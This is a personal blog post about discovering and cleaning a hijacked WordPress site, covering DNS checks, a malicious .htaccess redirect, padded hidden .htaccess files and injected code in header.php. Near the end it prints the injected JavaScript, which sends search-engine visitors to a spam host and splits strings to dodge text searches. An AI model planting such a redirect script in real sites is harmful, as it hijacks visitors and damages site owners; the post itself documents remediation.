WordPress Was Hijacked!

So, I opened up endlick.com and hoped to see some new content – ignoring the fact that I’m the only one who posts here and I sure as hell haven’t been vigilant about it – and saw some ad for insurance. endlick.com is a site where I post shitty content about computer issues and baudy tales of lust, not a site that advertises insurance plans.

My initial reaction after finding out that my blog was hijacked

My initial reaction after finding out that my blog was hijacked

Something was amiss! I put on my sleuthing hat and novelty pipe and set out to solve “The Mystery of the Shitty Website That Was Completely Fucked”.

Now, when it comes to troubleshooting, you want to determine the scope of the problem, and then isolate the issue. I didn’t follow this route because I assumed that this issue arose from me recently transferring a domain from GoDaddy to Namecheap. That domain was used for a few nameservers.
I figured that the nameservers were pointing to the incorrect place, so I started by investigating that.

My process was:
1) Visited the site on multiple devices (different networks) and via different browsers.
2) Checked other sites hosted with the same hosting company to determine which ones were affected.
3) Set the correct IP address to endlick.com in my hosts file and attempted to access the site.
4) Confirmed that the DNS was pointing to the correct place with Windows tracert.

At this point, I sat back confused. I had incorrectly assumed that it was a DNS issue, and effectively ruled it out. This is where things got interesting.
I checked what logs I could find in the hosting company’s admin panel and found that the site had no hits since August 4th. I transferred the domain around August 18th. I also didn’t realize that the site had been hijacked for more than 2 weeks.

lol.

5) This site runs WordPress, which is up to date. I checked for reported vulnerabilites in WordPress and found none.
6) In the WordPress database, I changed the template, stylesheet, current_theme columns to a different value to determine if the theme was responsible.
7) Deleted the contents in the active_plugins column to rule out plugins as the cause.
8) I commented out everything in WordPress’ index.php file to see if it would resolve the issue.
9) I created an index.html file to see if it would be accessed.

So, WordPress was not causing the issue. It wasn’t a DNS issue. It was a webserver issue. The final step was to figure out where the webserver settings were being changed.
This is using a shared server, so if the webserver’s config was compromised, a whole lot of sites would have been affected. I correctly assumed that it was running Apache, and looked for an .htaccess file. I didn’t see one. In fact, I didn’t see any dotfiles, since I was using some web admin panel which hid them.
I tried to set up ssh access, which I thought I was paying for but apparently am not. I tried to create an .htaccess file and got the error message “ERROR: Could not create file “.htaccess” in /home/myusername/public_html: File exists”

So, I poked around a bit more and found that the dotfiles could be displayed. The contents of .htaccess was just a redirect.

Jackpot.

I updated the .htaccess file, and my site was once again appearing.

I am thinking that some outdated Flash plugin to display pictures was the attack vector. Also, I probably had .htaccess set with stupid 777 permissions since I most likely was drunk when I set this site up several years ago.
I disabled most of the WordPress plugins, and hope that the problem is now solved.

 

EDIT: 2017-03-29 Oh no, but it wasn’t solved! Google has a nice service to send you an email to let you know if your site may be hijacked, and occasionally scans to make sure things are legit. After poring through the server-side files, I found a bunch of .htaccess files stashed away that appear to be only a few lines. On closer inspection, they are a few lines, followed by about 50 blank lines, then a bunch of redirects at the bottom. Each file was about 9 kilobytes in size.
I think those are all cleared out, but I’ve lost the coveted first place in Google when you search for “endlick”. I wasn’t getting much traffic anyways, but y’know, it’s a pride thing to say “Yeah, go onto Google and search for endlick and you’ll see my site”

EDIT: 2017-04-22 So, Google goes and declines a request that I put in to remove that “this site may be hacked” message from their listings, saying that the site still redirects on mobile. I’m thinking “nuh uh, I checked that, and it was .htaccess stuff”, completely incredulous and upset that it took them 2 weeks to reevaluate the site. However, they linked to a very useful case study that hinted at code being hidden in WordPress php files.
Welp, sure enough, there was a big chunk of JS in the “header.php” file. That redirects search engines to the spammy sites. Take a look at this code that was used, and note how it does string concatenation inside the JS function to….. lol, I don’t know. Avoid greps for “script” and “document”? Line breaks were added by me because I’m too lazy to edit the styles to fix it correctly because I want to wash my hands of all of this.


function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1
||Ref.indexOf('.bing.')!=-1
||Ref.indexOf('.yahoo.')!=-1
||Ref.indexOf('.aol.')!=-1
||Ref.indexOf('.ask.')!=-1
||Ref.indexOf('.altavista.')!=-1
||Ref.indexOf('.yandex.')!=-1){document.write(
'<script language="javascript">docu'+'ment.location=
"http://portal-b.pw/XcTyTp"</s'+'cript>')}else{document.write('.')}}R();
</script>
<script type="text/javascript">
function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1
||Ref.indexOf('.bing.')!=-1
||Ref.indexOf('.yahoo.')!=-1
||Ref.indexOf('.aol.')!=-1
||Ref.indexOf('.ask.')!=-1
||Ref.indexOf('.altavista.')!=-1
||Ref.indexOf('.yandex.')!=-1){document.write(
'<script language="javascript">docu'+'ment.location=
"http://portal-b.pw/XcTyTp"</s'+'cript>')}else{document.write('.')}}R();

Now it’s time for a resubmission and maybe this issue will be fixed.

Leave a Reply

Your email address will not be published. Required fields are marked *